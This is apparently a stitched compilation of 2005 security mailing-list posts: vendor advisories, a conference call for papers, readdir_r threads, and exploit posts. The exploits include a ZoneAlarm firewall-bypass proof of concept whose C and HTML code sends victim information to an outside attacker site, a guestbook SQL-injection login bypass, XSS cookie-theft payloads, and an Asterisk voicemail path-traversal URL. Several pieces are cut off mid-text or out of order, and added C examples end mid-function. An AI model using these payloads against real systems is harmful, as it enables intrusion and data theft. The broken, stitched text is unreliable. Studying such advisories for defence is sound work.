Hidden accounts on sony vaio laptops
Sony Vaio laptops require you to create a user account the first time you start the laptop. If the user you create is not "Administrator", Sony still goes ahead and creates a user "Administrator" with a blank password. This user does not show up in Control Panel under User Accounts, but if you start up in Safe Mode the laptop allows you to log in as Administrator. This gives an attacker an opportunity to gain administrative access to the computer, including the ability to create, add, delete, or modify user accounts. It is basically a backdoor account that is hidden from the user and compromises the security of all Sony Vaio laptops.

-- Securityforge: For all your security needs (http://www.securityforge.com)
Dbtech: Get the best programmers for your business (http://www.dbtech.org)
[TKADV2005-11-001] Multiple vulnerabilities in PHPlist
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:          Multiple vulnerabilities in PHPlist
Name:              TKADV2005-11-001
Revision:          1.0
Release Date:      2005/11/07
Last Modified:     2005/11/07
Author:            Tobias Klein (tk at trapkit.de)
Affected Software: PHPlist (all versions <= 2.10.1)
Risk:              Critical ( ) High (x) Medium (x) Low (x)
Vendor URL:        http://www.phplist.com/
Vendor Status:     Vendor has released an updated version

=====
Overview:
=====

PHPlist is a double opt-in newsletter manager. It is written in PHP and uses a SQL database for storing the information.

Version 2.10.1 and prior contain multiple Cross Site Scripting and SQL Injection vulnerabilities. Furthermore, it is possible to access and read arbitrary system files through a vulnerability in PHPlist.

=====
Solution:
=====

Upgrade to PHPlist 2.10.2 or newer.
http://www.phplist.com/files/

For more technical details see:
http://www.trapkit.de/advisories/TKADV2005-11-001.txt

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQ2+xMpF8YHACG4RBEQLokQCg7cyW6AfrNYY7WZ06mPBrH3uos/cAn06l
roUuWofKu3koFc4l62Za1mEY
=rRgy
-----END PGP SIGNATURE-----
LayerOne 2006 CFP Released
LayerOne 2006 - Call for Papers
April 22 & 23, 2006
Los Angeles, California
At the Pasadena Hilton
http://layerone.info

What is LayerOne?

Currently in its 3rd year, LayerOne is a computer security and technology conference held in the Los Angeles area. The purpose of LayerOne is to bring together the many different kinds of people who make up the security community for a two-day discussion of the technologies that impact our professional and personal lives.

Who should attend LayerOne?

Just about anyone who is concerned with computer, information, and Internet security and the issues arising from it. Developers, system administrators, lawyers, IT managers, students, hackers, engineers, privacy advocates, hardware hackers, open source fans, and garden-variety geeks will all find something of interest at LayerOne. Previous speakers have included the likes of Dan Kaminsky (Doxpara Research), Dave Hulton (Toorcon), Danny O'Brien (NTK), and Bruce Potter (Shmoo Group).

Call for Papers

LayerOne is now officially accepting papers and presentations for consideration at our 2006 show. We are looking for people to speak on a broad range of topics, so all submissions will be considered. At the moment we're interested in hearing from potential speakers with the following interests:

* Data Forensics
* Reverse Engineering
* VoIP (security and development)
* Emerging Security Trends
* Regulatory Issues (SOX, PCI, ISO 17799, etc.)
* Firmware/Embedded Systems Hacking

Please note that we'd love to see as broad a range of topics this year as we did last year, so don't consider this a strict guideline on what we'd like people to submit. If you've got something that you think will fit, by all means send it in. To see a list of topics from 2005, please visit our website.

Please be sure to include the following information in your submission:

* Presentation name
* A one-sentence synopsis of your presentation
* A longer one to three paragraph synopsis or short outline of what you plan on covering
* Names of and URLs for the presenter(s)
* A short (single-paragraph) biography of the presenter(s)

Once everything's ready to go, send your submission to cfp [at] layerone [dot] info no later than March 31, 2006. All papers submitted by then will receive either an acceptance or rejection notice no later than April 5th, 2006. Speaker selection is expected to be finalized on this date.

Although we only have one speaking track, please bear in mind that speaking slots are limited to one hour. How you use that time is entirely up to you, but most people tend to divide it between presentation and a Q&A session. If you think your presentation will run longer, please advise us when you turn in your proposal and we will do our best to take your needs into consideration.

If the presentation is based on code or a particular technique, the presenter must be one of the developers of the code/technique and be prepared to perform a demonstration.

We look forward to reading over your submissions, which we are sure will be outstanding. Once again, if you have any questions or submissions please email cfp [at] layerone [dot] info. Thank you for your interest, and we look forward to seeing you there.
e107 Games System exploit
You can insert a high score into game_score.php using the POST method. The system reads these variables directly from the request, so a simple HTML form posting to game_score.php will allow you to add a high score:

    $player_name  = $_POST['name'];
    $player_score = $_POST['score'];
    $game_name    = $_POST['game'];

willeh
willey_wonka at hotmail dot com
Re: [Full-disclosure] Re: readdir_r considered harmful
>On 11/6/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>> I don't see how that is relevant; the typical use of readdir() is as follows:
>>
>>        DIR *dirp = opendir(name);
>>
>>        while ((dent = readdir(dirp)) != NULL) {
>>                ...
>>        }
>>
>>        closedir(dirp);
>>
>> Nothing other threads do with readdir() on different dirp's will influence
>> what "dent" points to.
>
>The issue is multiple threads using the same DIR.

No, it isn't. I certainly limited the scope of my contribution to single threads reading from a DIR.

All the 80-odd uses of readdir_r() in the Solaris core source code can (and should) be replaced with readdir(). All have a single thread reading and reusing the same "struct dirent", so readdir() could be used in POSIXly correct fashion if the following sentence in the Open Group's manual page was not present:

    "The readdir() function need not be reentrant. A function that is not
    required to be reentrant is not required to be thread-safe."

I believe that this is an error in POSIX; when "threadedness" was added, the manual page could have been changed to indicate that a single thread using the above idiom was safe. Had they done so, we would never have had to use readdir_r(), and programmers would not have introduced bugs in the (mis)use of pathconf, over-allocating, etc.

I would be interested in seeing any real-world use of readdir_r() in a context where readdir_r() is required (multiple threads reading from a single DIR *).

Casper
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/6/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> I don't see how that is relevant; the typical use of readdir() is as follows:
>
>        DIR *dirp = opendir(name);
>
>        while ((dent = readdir(dirp)) != NULL) {
>                ...
>        }
>
>        closedir(dirp);
>
> Nothing other threads do with readdir() on different dirp's will influence
> what "dent" points to.

The issue is multiple threads using the same DIR.
Re: [Full-disclosure] Re: readdir_r considered harmful
>Then you never really understood the implementation, it seems. Of course
>all implementations keep the content of the directory as read with
>getdents or so in the DIR descriptor. But it is usually not the case
>that the whole content fits into the buffer allocated. One could, of
>course, resize the buffer to fit the content of the directory read,
>even if this means reserving hundreds or thousands of kBs. But this
>is not how most implementations work.

I don't see how that is relevant; the typical use of readdir() is as follows:

        DIR *dirp = opendir(name);

        while ((dent = readdir(dirp)) != NULL) {
                ...
        }

        closedir(dirp);

Nothing other threads do with readdir() on different dirp's will influence what "dent" points to.

I have *never* seen a program where multiple threads read from a single dirp; and I can't imagine the use.

>Instead, implementations keep working similarly to every buffered file I/O
>operation. But this means that buffer content is replaced. If this
>happens and some thread uses readdir() instead of readdir_r(), the
>returned string pointer suddenly becomes invalid since it points to
>memory which has been replaced.

Yes, the next call to readdir() *on the same dirp* may change what the previous call returned; but that's completely irrelevant for most uses of readdir(). Of course, an application may want to save all readdir() return values, but that is completely orthogonal to threads; there is no reason why the POSIX *thread* specification includes readdir_r().

>Next time, before you make such comments, ask Don Cragun to explain
>things to you.

Next time before you mail, you might want to engage your brain. There is NO reason for a thread-safe library to use readdir_r() over readdir(), with common readdir() implementations.

Casper
[USN-214-1] libungif vulnerabilities
===========================================================
Ubuntu Security Notice USN-214-1              November 07, 2005
libungif4 vulnerabilities
CVE-2005-2974, CVE-2005-3350
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
Ubuntu 5.10 (Breezy Badger)

The following packages are affected:

libungif4g

The problem can be corrected by upgrading the affected package to version 4.1.0b1-6ubuntu0.1 (for Ubuntu 4.10), 4.1.3-1ubuntu0.1 (for Ubuntu 5.04), or 4.1.3-2ubuntu0.1 (for Ubuntu 5.10). In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Chris Evans discovered several buffer overflows in the libungif library. By tricking a user (or automated system) into processing a specially crafted GIF image, this could be exploited to execute arbitrary code with the privileges of the application using libungif.

Updated packages for Ubuntu 4.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.0b1-6ubuntu0.1.diff.gz
      Size/MD5:   299066 b1e73895c7e0ad79c0e19e6cdc17e0a0
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.0b1-6ubuntu0.1.dsc
      Size/MD5:      654 e77c0c985a9a69be2306521c68c90948
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.0b1.orig.tar.gz
      Size/MD5:   351757 20d96eb90cf818a1da093614c44ad3e5

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.0b1-6ubuntu0.1_amd64.deb
      Size/MD5:   220664 20b10d4a5722c313fb9087e9637d3932
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.0b1-6ubuntu0.1_amd64.deb
      Size/MD5:    36512 7267a1987fbabd4933e000ccb1506db3
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.0b1-6ubuntu0.1_amd64.deb
      Size/MD5:    52450 e518ccb9521345253a7195baf59d304c

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.0b1-6ubuntu0.1_i386.deb
      Size/MD5:   202984 f68d125ce049c9507756e83bad2549dc
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.0b1-6ubuntu0.1_i386.deb
      Size/MD5:    34294 3b22cf5ce6d91f4f9f1c27e9a9ec6d75
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.0b1-6ubuntu0.1_i386.deb
      Size/MD5:    51064 ce716cf26fdc0b27230dafea49d005c0

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.0b1-6ubuntu0.1_powerpc.deb
      Size/MD5:   235062 acc2f9eb7dfc2a0f1e4551a2217fc579
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.0b1-6ubuntu0.1_powerpc.deb
      Size/MD5:    36562 84f4b4a0ed7e5f5a35b9ac7789e70a3e
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.0b1-6ubuntu0.1_powerpc.deb
      Size/MD5:    53420 c0b95884ad01a6ec49aa4a0fbbd71411

Updated packages for Ubuntu 5.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.3-1ubuntu0.1.diff.gz
      Size/MD5:    27712 4835a55c199b8bad795cb36ccd844b32
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.3-1ubuntu0.1.dsc
      Size/MD5:      639 7a91eda1b7d0ec48c26f69518e6787f9
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4_4.1.3.orig.tar.gz
      Size/MD5:   569667 cb11e300347ad29e502abc6f56fd23df

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)

    http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.3-1ubuntu0.1_amd64.deb
      Size/MD5:   224438 efe72b94ed939de9b85e556e07fb228d
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.3-1ubuntu0.1_amd64.deb
      Size/MD5:    41158 381aaff6c58f9402275bf37cf3c58abf
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.3-1ubuntu0.1_amd64.deb
      Size/MD5:    57506 88918dea5ab32a782a8e1d731a4b4f24

  i386 architecture (x86 compatible Intel/AMD)

    http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.3-1ubuntu0.1_i386.deb
      Size/MD5:   206076 a81c6995f1e3ebbba7ce725171574b59
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4-dev_4.1.3-1ubuntu0.1_i386.deb
      Size/MD5:    38928 8def52728fce5ef3fcaf3137c3cd2ce3
    http://security.ubuntu.com/ubuntu/pool/main/libu/libungif4/libungif4g_4.1.3-1ubuntu0.1_i386.deb
      Size/MD5:    56194 474750d2fddcf82434a136014e1cb2d9

  powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/universe/libu/libungif4/libungif-bin_4.1.3-1ubuntu0.1_powerpc.deb
      Size/MD5:   238938 f36748ba01f1527ef18be9ccf8c51456
    http://security.ubuntu.co
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability
Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability

I. PRODUCT BACKGROUND

ZoneAlarm Pro and ZoneAlarm Internet Security Suite include a new layer of protection that Zone Labs calls an "OS Firewall", based on "Behavior Based Analysis". It goes beyond network-level protection and defends a Windows PC against a range of local attacks. The personal firewalls available so far protect PCs only against network-based attacks; the Zone Labs "OS Firewall" monitors activity at the kernel level and blocks attacks at several layers. It alerts the user on unusual activity in the system, such as changes to critical registry keys, changes to start-up entries, any kind of inter-process interaction, and processes making outbound connections through other trusted programs. When ZoneAlarm sees unusual activity between applications, it can stop a process's memory from being read, or block unauthorized driver and service loading.

The PoC below shows how ZoneAlarm's Advance Program Control and Behavior Based Technology can be defeated with an HTML modal dialog box.

II. TECHNICAL DESCRIPTION

With Advance Program Control or OS Firewall Technology enabled, Zone Alarm products detect and block almost all of the APIs (Shell, ShellExecuteEx, SetWindowText, SetDlgItem, etc.) that malicious programs commonly use to send data over HTTP by piggybacking on other trusted programs. However, a malicious program (a trojan, worm, etc.) can still make outbound connections to the attacker's site by piggybacking on the trusted Internet browser, using an "HTML Modal Dialog" together with a few lines of JavaScript. This assumes that the default browser (IE, Firefox, etc.) is authorized to access the Internet; in a default installation of ZoneAlarm Pro, IE is allowed Internet access.

The PoC (Proof-of-Concept) in Section V explains the hack; the exploit code is included for reference.

III. IMPACT

On successful exploitation, the malicious program can send the victim's details and personal system information to the attacker, which can further lead to complete system compromise.

IV. AFFECTED PRODUCTS

Zone Alarm Pro 6.0.x
Zone Alarm Internet Security Suite 6.0.x
Zone Alarm Firewall with Anti-Spyware 6.1.x
Zone Alarm Firewall with Anti-Virus 6.0.x
Zone Alarm Firewall (Free Version) 6.0.x

V. PROOF-OF-CONCEPT

Using the ShowHTMLDialog() function exported by MSHTML.DLL, any malicious program can create a modal dialog box that displays HTML. The HTML in turn redirects the dialog to the attacker's site. With this method, ZA Pro and Internet Security Suite were observed not to block Internet access. A malicious program can use it both to send data out over HTTP to the attacker and to receive command instructions back from the attacker.

The exploit code is given below:

<<< osfwbypass-demo.c >>>

    #include <windows.h>
    #include <mshtmhst.h>   /* SHOWHTMLDIALOGFN */
    #include <urlmon.h>     /* CreateURLMoniker */

    BOOL LoadHtmlDialog(void)
    {
        HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
        if (hinstMSHTML)
        {
            SHOWHTMLDIALOGFN *pfnShowHTMLDialog;

            // Open a modal dialog box of HTML content type
            // (GetProcAddress takes a narrow string, not TEXT())
            pfnShowHTMLDialog = (SHOWHTMLDIALOGFN *)GetProcAddress(hinstMSHTML, "ShowHTMLDialog");
            if (pfnShowHTMLDialog)
            {
                IMoniker *pURLMoniker = NULL;

                // Invoke the html file containing the data to be sent via http
                BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
                CreateURLMoniker(NULL, bstrURL, &pURLMoniker);
                if (pURLMoniker)
                {
                    (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
                    pURLMoniker->lpVtbl->Release(pURLMoniker);   // C form of the COM call
                }
                SysFreeString(bstrURL);
            }
            FreeLibrary(hinstMSHTML);
        }
        return TRUE;
    }

<<< +++ >>>

<<< modal-dialog.htm >>>

    <html>
    <head>
    <title>Redirection Dialog</title>
    <script type="text/javascript">
        var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your Information Here]";
        window.location.href = sTargetURL;
        window.close();
    </script>
    </head>
    <body></body>
    </html>

<<< +++ >>>

VI. DEMONSTRATION

For a live demonstration, the compiled binary ("osfwbypass-demo.exe") and the HTML redirection script ("modal-dialog.htm") are enclosed with this advisory. To test, follow these steps:

a. Extract both "osfwbypass-demo.exe" and "modal-dialog.htm" to "C:\". [Note: you can extract "osfwbypass-demo.exe" to whatever location you like, but do not move "modal-dialog.htm" anywhere other than "C:\", otherwise the PoC won't work; just to save time, the path is hardcoded.]

b. Run "osfwbypass-demo.exe" and click the "GO" button. This opens "modal-dialog.htm" in a modal dialog box, which then redirects to the evil site and sends the sample user info to it via the URL.

c. First
Re: [Full-disclosure] Re: readdir_r considered harmful
On 11/5/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
> Why not:
>
> 4. Require the readdir() implementation to use state local to dirp.
>
> I've never understood the rationale behind readdir_r;

Then you never really understood the implementation, it seems. Of course all implementations keep the content of the directory as read with getdents or so in the DIR descriptor. But it is usually not the case that the whole content fits into the buffer allocated. One could, of course, resize the buffer to fit the content of the directory read, even if this means reserving hundreds or thousands of kBs. But this is not how most implementations work.

Instead, implementations keep working similarly to every buffered file I/O operation. But this means that buffer content is replaced. If this happens and some thread uses readdir() instead of readdir_r(), the returned string pointer suddenly becomes invalid since it points to memory which has been replaced.

Next time, before you make such comments, ask Don Cragun to explain things to you.
Re: Re: Mambo Open Source, Path disclosure
You are right, the mamboserver solution is available now:

The fix is easy. In /component/com_content/content.php, approx. line 190, change the block FROM:

    // Parameters
    $params = new stdClass();
    if ( $Itemid ) {
        $menu = new mosMenu( $database );
        $menu->load( $Itemid );
        $params =& new mosParameters( $menu->params );
    } else {
        $menu = "";
        $params =& new mosEmpty();
    }

TO READ:

    // Parameters
    $params = new stdClass();
    if ( $Itemid ) {
        $menu = new mosMenu( $database );
        $menu->load( $Itemid );
        $params =& new mosParameters( $menu->params );
    } else {
        $menu = "";
        $params =& new mosParameters(''); //mosEmpty();
    }

best regards
Alireza Hassani
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]
Advanced Guestbook 2.2 ( SQL Injection Exploit )
The Advanced Guestbook 2.2 web application (PHP, MySQL) appears vulnerable to SQL injection granting the attacker administrator access.

Target  : http://www.example.com/[GuestbookTarget]/admin.php
Username: ' or 1=1 /*
Password: (nothing, leave blank)

It's working on Advanced Guestbook 2.2; version 2.3.1 will fix this vulnerability.

Report by : POPO ( Pooya )
From www.Babol-Hackers.com
[EMAIL PROTECTED]
Y! ID : bhs_team , pooya_0nline
---
BHS-Team We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p
Asterisk vmail.cgi vulnerability
Assurance.com.au - Vulnerability Advisory
---
Release Date: 07-Nov-2005

Software: Asterisk Web-VoiceMail (Comedian VoiceMail)
http://www.asterisk.org/

Asterisk is a complete PBX in software. It runs on Linux, BSD and MacOSX and provides all of the features you would expect from a PBX and more. Asterisk does voice over IP in many protocols, and can interoperate with almost all standards-based telephony equipment using relatively inexpensive hardware.

Versions affected:
Asterisk Versions <= 1.0.9
Asterisk Beta Versions <= 1.2.0-beta1
Asterisk @ Home Versions <= 1.5
Asterisk @ Home Beta Versions <= 2.0 Beta 4

Vulnerability discovered:
A vulnerability in the voicemail retrieval system allows an authenticated user to download any .wav/.WAV file from the system, including other users' voicemail messages.

Vulnerability impact:
Low - Insecure web UI causes breach of privacy

Vulnerability information:
vmail.cgi does not sanitize a parameter passed by the web user which is later used to open a file and return a raw stream to the user. This allows any authenticated user of the voicemail system to listen to other people's messages, or to open any file with the extension .wav/.WAV on the system.

Example:

    http://asterisk.example.org/cgi-bin/vmail.cgi?action=audio& \
        folder=../201/INBOX&mailbox=200&context=default&password=12345 \
        &msgid=0001&format=wav

This will return /var/spool/asterisk/voicemail/default/201/INBOX/msg0001.wav when logged in as the 'extension 200' user.

Solution:
Asterisk has released patches for the vulnerabilities.

Ensure you are running Asterisk versions > 1.0.9 / 1.2.0-beta1
Ensure you are running Asterisk @ Home versions > 1.5 / 2.0 beta 4

References:
Assurance.com.au advisory
http://www.assurance.com.au/advisories/200511-asterisk.txt
Asterisk advisory note
http://www.asterisk.org/changelog

Credit:
Adam Pointon of Assurance.com.au
http://www.assurance.com.au/

Disclosure timeline:
17-Oct-2005 - Discovered during a quick audit of the Asterisk web UI
18-Oct-2005 - Email sent to support and the primary author
18-Oct-2005 - Immediate response received
31-Oct-2005 - Patched version committed to CVS
07-Nov-2005 - Advisory released

About us:
Assurance.com.au is a specialised information security consultancy. Our mission is to help organisations identify and secure their information assets. Our expertise concentrates in security architecture design, managed security and professional services in security testing/review and compliance. Supporting this approach are professional and managed services in the following areas:

* Compliance Services - Penetration testing, security reviews, compliance and audit services
* Wireless and mobility solutions - design, installation and management of IEEE 802.11a/b/g (WiFi), tele-mobility and other wireless solutions
* UNIX-like systems, network and security advice and consulting

Assurance.com.au also provides organisations with services to support compliance to legislative, public and internal/private standards. While primarily specialising in Australian & New Zealand standards efforts, Assurance.com.au also works with other international standards related to information security. These include:

* ISO/IEC 17799:*, AS/NZS 17799:*, BS7799
* ISO 15408 (Common Criteria), ITSEC, TCSEC
* ISO 13569, ISO 11131
* ACSI33, AS2805, AS3806, AS4360, AS4539, AS8018, HB231:2001, NPP4 (privacy)
* Sarbanes-Oxley
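The check the advisory says vmail.cgi lacked, as an added example in C (not Asterisk's own code, which is a Perl CGI): every request value that becomes a path component is confined to a single plain name before the message path is assembled, and the mailbox is taken from the authenticated session rather than from the request, so extension 200 cannot reach 201's INBOX either by traversal or by changing mailbox=. The spool directory is the one in the advisory; the allowlists of folder and format names are assumptions for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Asterisk's vmail.cgi. Spool path from the advisory;
 * the folder and format allowlists below are assumptions. */
#define VM_SPOOL "/var/spool/asterisk/voicemail"

static const char *const ALLOWED_FOLDERS[] = { "INBOX", "Old", "Work", "Family", "Friends", NULL };
static const char *const ALLOWED_FORMATS[] = { "wav", "WAV", "gsm", NULL };

static int in_list(const char *const *list, const char *s)
{
    for (; *list; list++)
        if (strcmp(*list, s) == 0)
            return 1;
    return 0;
}

/* A safe path component is non-empty, at most 64 bytes and made only of
 * [A-Za-z0-9_-]; it therefore cannot contain '/', '.', or a ".." element. */
int is_safe_component(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 64)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Builds VM_SPOOL/context/mailbox/folder/msgNNNN.fmt into `out`.
 * `session_mailbox` is the mailbox the user authenticated as; the request's
 * own mailbox= parameter is deliberately not consulted.
 * Returns 1 on success, 0 if any value is rejected or the path would be
 * truncated. */
int voicemail_path(const char *context, const char *session_mailbox,
                   const char *folder, const char *msgid, const char *format,
                   char *out, size_t outlen)
{
    if (!is_safe_component(context) || !is_safe_component(session_mailbox) ||
        !is_safe_component(msgid))
        return 0;
    if (!in_list(ALLOWED_FOLDERS, folder) || !in_list(ALLOWED_FORMATS, format))
        return 0;
    int n = snprintf(out, outlen, "%s/%s/%s/%s/msg%s.%s",
                     VM_SPOOL, context, session_mailbox, folder, msgid, format);
    return n > 0 && (size_t)n < outlen;
}

/* The advisory's request: logged in as mailbox 200, folder=../201/INBOX.
 * Returns 1 when the traversal attempt is refused. */
int advisory_request_rejected(void)
{
    char out[256];
    return voicemail_path("default", "200", "../201/INBOX", "0001", "wav",
                          out, sizeof out) == 0;
}

/* The same user asking for their own INBOX; returns the built path. */
const char *legitimate_request_path(void)
{
    static char out[256];
    if (!voicemail_path("default", "200", "INBOX", "0001", "wav", out, sizeof out))
        return NULL;
    return out;
}

int main(void)
{
    printf("traversal rejected: %d\n", advisory_request_rejected());
    printf("legitimate path:    %s\n", legitimate_request_path());
    return 0;
}
```

An allowlist of folder names is preferable to only stripping "../": Asterisk's folders are a small fixed set, and a positive match is simpler to reason about than a denylist of path syntax. Taking the mailbox from the session closes the second hole the advisory's example relies on, namely that the request also carried mailbox=200 while the folder walked into 201.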
Invision Power Board 2.1 : Multiple XSS Vulnerabilities
Fast translation of benji's advisory

***
Author       : benjilenoob
WebSite      : http://benji.redkod.org/ and http://www.redkod.org/
Audit in pdf : http://benji.redkod.org/audits/ipb.2.1.pdf
Product      : Invision Power Board
Version      : 2.1
Risk         : Low. XSS

I- XSS, non critical:

1. Input passed to the $address variable isn't properly verified in the administrative section. This can be exploited by providing a valid login and JavaScript code in the variable. The code will be executed in a user's browser session in the context of an affected site.
PoC: http://localhost/2p1p0b3/upload/admin.php?adsess=[xss]&act=login&code=login-complete
This could be exploited to steal cookie information.

2. Input passed to the "ACP Notes" textarea field in the administrative section isn't properly verified. This can be exploited to insert JavaScript code in the notes. The code will be executed in a user's browser session in the context of an affected site.
PoC: '"/><script>alert(document.cookie)</script>

3. Input passed to the "Member's Log In User Name", "Member's Display Name", "Email Address contains...", "IP Address contains...", "AIM name contains...", "ICQ Number contains...", "Yahoo! Identity contains...", "Signature contains...", "Less than n posts", "Registered Between (MM-DD-)", "Last Post Between (MM-DD-)" and "Last Active Between (MM-DD-)" member profile parameters in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

4. Non-permanent XSS:
http://localhost/2p1p0b3/upload/admin.php?adsess=[id]&section=content&act=forum&code=new&name=[xss]

5. Non-permanent XSS after administrative login:
http://localhost/2p1p0b3/upload/admin.php?name=[xss]&description=[xss]

6. Input passed to the "description" field of a "Component" in the "Components" section of the administrative section isn't properly verified. This can be exploited to insert JavaScript code.
PoC: '"/><script>alert()</script>

7. Input passed to the "Member Name", "Password", "Email Address" fields of a new member's profile in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

8. Input passed to the "Group Icon Image" field of a new Group in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

9. Input passed to the "Calendar: Title" of a new Calendar in the administrative section isn't properly verified. This can be exploited to insert JavaScript code.

Benji
Team RedKod
http://www.redkod.org/
***

Regards,
/JA
http://www.securinfos.info
[ GLSA 200511-06 ] fetchmail: Password exposure in fetchmailconf
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200511-06
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: fetchmail: Password exposure in fetchmailconf
      Date: November 06, 2005
      Bugs: #110366
        ID: 200511-06

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

fetchmailconf fails to properly handle file permissions, temporarily
exposing sensitive information to other local users.

Background
==========

fetchmail is a utility that retrieves and forwards mail from remote
systems using IMAP, POP, and other protocols. It ships with
fetchmailconf, a graphical utility used to create configuration files.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  net-mail/fetchmail        < 6.2.5.2-r1               >= 6.2.5.2-r1

Description
===========

Thomas Wolff discovered that fetchmailconf opens the configuration file
with default permissions, writes the configuration to it, and only then
restricts read permissions to the owner.

Impact
======

A local attacker could exploit the race condition to retrieve sensitive
information like IMAP/POP passwords.

Workaround
==========

Run "umask 077" to temporarily strengthen default permissions, then run
"fetchmailconf" from the same shell.

Resolution
==========

All fetchmail users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-mail/fetchmail-6.2.5.2-r1"

References
==========

  [ 1 ] Fetchmail Security Advisory
        http://fetchmail.berlios.de/fetchmail-SA-2005-02.txt
  [ 2 ] CVE-2005-3088
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3088

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200511-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
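The create-then-chmod race the GLSA describes, reproduced as an added example in C (fetchmailconf itself is a Python program; this is not its code). The vulnerable function creates the file with the process default mode, writes a secret, and only then tightens the mode; it returns the permission bits another local user would see in that window. The fixed function asks for 0600 at creation, so no window exists. The umask values are the advisory's: 022 as a typical default, 077 as its workaround. The secret line and the /tmp scratch path are constructed for the demonstration.

```c
#define _DEFAULT_SOURCE 1
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Added example, not fetchmail's code. Constructed sample secret. */
static const char SECRET[] = "poll mail.example.org proto imap user alice password hunter2\n";

/* Creates a fresh scratch directory and composes out = dir/.fetchmailrc.
 * Returns 0 on success; scratch_cleanup() removes both afterwards. */
static int scratch_path(char *dir, size_t dirlen, char *out, size_t outlen)
{
    snprintf(dir, dirlen, "/tmp/fmconf-exampleXXXXXX");
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(out, outlen, "%s/.fetchmailrc", dir);
    return 0;
}

static void scratch_cleanup(const char *dir, const char *file)
{
    unlink(file);
    rmdir(dir);
}

/* Vulnerable pattern under the given umask. Returns the permission bits the
 * file carried while the secret was already on disk and before the chmod,
 * i.e. what a racing local user can read. -1 on error. */
int racy_mode_with_umask(mode_t mask)
{
    char dir[64], file[128];
    if (scratch_path(dir, sizeof dir, file, sizeof file) != 0)
        return -1;

    mode_t old = umask(mask);
    FILE *fp = fopen(file, "w");             /* created as 0666 & ~mask */
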